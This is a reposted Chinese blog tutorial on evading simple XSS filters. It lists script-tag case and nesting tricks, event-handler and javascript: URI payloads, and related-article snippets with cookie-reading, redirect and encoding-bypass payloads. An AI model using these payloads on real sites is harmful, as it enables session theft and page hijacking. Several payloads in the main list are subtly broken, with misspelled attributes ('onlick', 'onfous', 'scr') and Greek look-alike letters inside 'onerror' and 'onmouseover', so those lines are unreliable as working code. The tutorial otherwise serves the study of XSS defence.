XSS的简单过滤和绕过

最新推荐文章于 2024-05-04 20:20:27 发布
最新推荐文章于 2024-05-04 20:20:27 发布
阅读量349 收藏
点赞数
文章标签: javascript ViewUI
原文链接:http://www.cnblogs.com/puhk/p/11532088.html
版权

XSS的简单过滤和绕过

程序猿用一些函数将构成xss代码的一些关键字符给过滤了。是,道高一尺魔高一丈,虽然过滤了,还是可以尝试进行过滤绕过,以达到XSS攻击的目的。

 

最简单的是输入<script> alert(7)</script> 弹出7

 

一:区分大小写过滤标签

可以使用大小写绕过 <scripT>alert(7)</scripT>

二:嵌套过滤标签

可以使用嵌套的script标签绕过<scr<script>ipt>alert(7)</scr</script>ipt>

三:除了<script>标签,还可以通过img、body等标签注入恶意js代码。

<img src=1 οnerrοr=alert(7)>   

<img src=1 onlick=alert(7)>

<img src=1 οnmοuseοver=alert(7)> (鼠标移到上面就会触发)

<input scr=1 onfous="alert(7)">    

<a href="javascript:alert(7)">

<object data="javascript:alert(/7/)">     

<body οnlοad=alert(7)>

 

转载于:https://www.cnblogs.com/puhk/p/11532088.html

weixin_30241919
关注
xss绕过字符过滤_XSS绕过实战练习
weixin_39640203的博客
12-21 741
前言写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下。有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战平台进行实现。level1未进行过滤,直接输入payloadpayload:alert(/xss/)level2发现对html特殊符号进行了实体编码,失效,但是发现下面input标签里还有一个输出点,可...
XSS攻击的简单过滤绕过
caoxinjian423的博客
09-02 3369
一、常见的XSS攻击脚本 弹窗警告 <script>alert('XSS')</script> <script>alert(document.cookie)</script> 页面嵌套 <iframe> src=http://www.baidu.comwidth=10 height=10 border=10 </iframe> 重定向 <script>window.location="http://www.b.
javascript过滤XSS
05-06
javascript写的过滤XSS代码,危险代码被转义而不是被删除. 根目录下js-xss-master/dist/test.html是例子.
xss过滤代码
weixin_34200628的博客
05-15 140
#!/usr/bin/env python # -*- coding:utf-8 -*- from bs4 import BeautifulSoup class XSSFilter(object): __instance = None def __init__(self): # XSS白名单 self.valid_tag...
xss过滤
hit、run
11-30 1471
private String xssEncode(String value) { if (value == null || value.isEmpty()) { return value; } value = value.replaceAll("eval\\((.*)\\)", ""); ...
XSS代码分析-和简单过滤,学习笔记
ZhangAweio的博客
04-05 461
PHP环境。
XSS篇——XSS过滤绕过技巧
weixin_50464560的博客
05-07 3540
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
第十二节 XSS 过滤绕过-01
09-15
XSS 过滤绕过技术详解 ...XSS 过滤绕过技术需要攻击者具备深入的知识和经验,包括 Web 应用程序安全、XSS 攻击技术、自动化工具使用等。Web 开发者需要了解这些技术,来防止 XSS 攻击和保护用户信息。
XSSBypass:XSS绕过技术
05-17
2. **XSS过滤器与绕过** - Web应用程序通常会使用过滤器来防止XSS攻击,但这些过滤器可能有漏洞或不够完善。攻击者可以通过编码、字符集转换、使用特殊字符、或者利用过滤器的逻辑漏洞来绕过防御。 - 例如,使用...
xss绕过字符过滤_XSS过滤绕过总结
weixin_39610353的博客
12-21 1239
XSS过滤绕过总结黑名单过滤绕过黑名单模式下的过滤器是最常见的。他们的目标是检测特定模式并防止恶意行为。这完全是“模式”的问题,它们越准确,就越可以拦截攻击。1. 注入脚本代码主要是标签,可用于执行客户端脚本代码,例如JavaScript。 它是为此目的而设计的,当然,这是大多数过滤器阻止的第一个首选。1.1 绕过弱标签过滤简单过滤器无法涵盖所有可能的情况,所以可以绕开它们。 以下示例仅是对...
XSS绕过方法总结
xinyue9966的博客
11-02 1652
xss绕过方法 大小写绕过 双写绕过 alert(1) 替换绕过 过滤 alert 用prompt,confirm,top’alert’代替绕过 过滤() 用``代替绕过 过滤空格 用%0a(换行符),%0d(回车符),/**/代替绕过 小写转大写情况下 字符ſ大写后为S(ſ不等于s) %00截断绕过 xss 编码绕过 实体编码 javascript:alert(1) 十六进制 javascript:alert(1) 十进制 unicode编码 javascripu0074:alert(1) url编码
反射型XSS绕过案例总结
zaqwescsdn的博客
06-26 1463
1.查看< / "等字符的过滤情况如果没有,直接X。 什么都没过滤的入门情况2.考虑用&#x的形式代替,如果没有过滤& # 理论上可以代替任意字符,但是一般都会将&过滤为&amp。 输出在<script></script>之间的情况//这里构造的代码没懂 输出在HTML属性里的情况3.gbXXXX系列的可以考虑使用宽字符%c0杀掉双引号,可能是因为过滤的正则写的有问题。 宽字节复仇记 [Q
XSS 绕过指南
weixin_51681694的博客
04-22 1539
因为各种原因,在此总结一下网络上的绕过方法以及个人的经验,会不断更新,若有错误请私信
Xss漏洞常见绕过过滤攻击场景
最新发布
chaottop的博客
05-04 2249
在某些情况下,后台作的过滤非常简单,只对一些特殊的字符串作黑名单过滤,导致可直接通过字母大小写绕过后台的过滤。如下例子
Bypass xss过滤的测试方法
中华传奇
07-27 518
0x00 背景 本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽说是绕WAF的,但这里还是根据WAF中的正则缺陷来绕过测试方法,并不是协议上...
xss过滤技巧
Richard_qi的博客
04-11 3660
xss过滤技巧(个人记录) 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以转换为: <ScRipt>ALeRt(“XSS”);</sCRipT> 关闭标签 有时候我们需要关闭标签来使我们的XSS生效。 比如:“><script>alert(“Hi”);</script> 使用hex编码绕过 我们可以对我们的语句进行hex编码来绕过X
常见的绕过XSS过滤的方法
热门推荐
小白渣的博客
03-02 1万+
xss绕过过滤之方法 很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成<以及>,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么就会转换成“<script src=1.js></script>”,不能执行,因此,很多人认为只要用户的...
XSS过滤绕过手法与加载payload
NZXHJ的博客
07-29 1868
关于各类XSS注入过滤绕过手法,以及利用XSS平台加载注入payload讲解
完美过滤script标签
gocuber的博客
09-14 4019
完美过滤script标签 // .* 不能匹配换行 // [\s\S]* 支持匹配换行 // ? 表示匹配最近的一个结束标签&lt;/script&gt; // i 不区分大小写 $html = preg_replace('/&lt;script[\s\S]*?&lt;\/script&gt;/i', '', $html);...
xss 空格过滤绕过
07-27
XSS(跨站脚本攻击)是一种...重要的是要意识到,绕过空格过滤只是XSS攻击的一种方式,还有其他许多方法可以进行XSS攻击。为了保护网站免受XSS攻击,建议采取综合的安全措施,包括输入验证、输出编码、内容安全策略等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值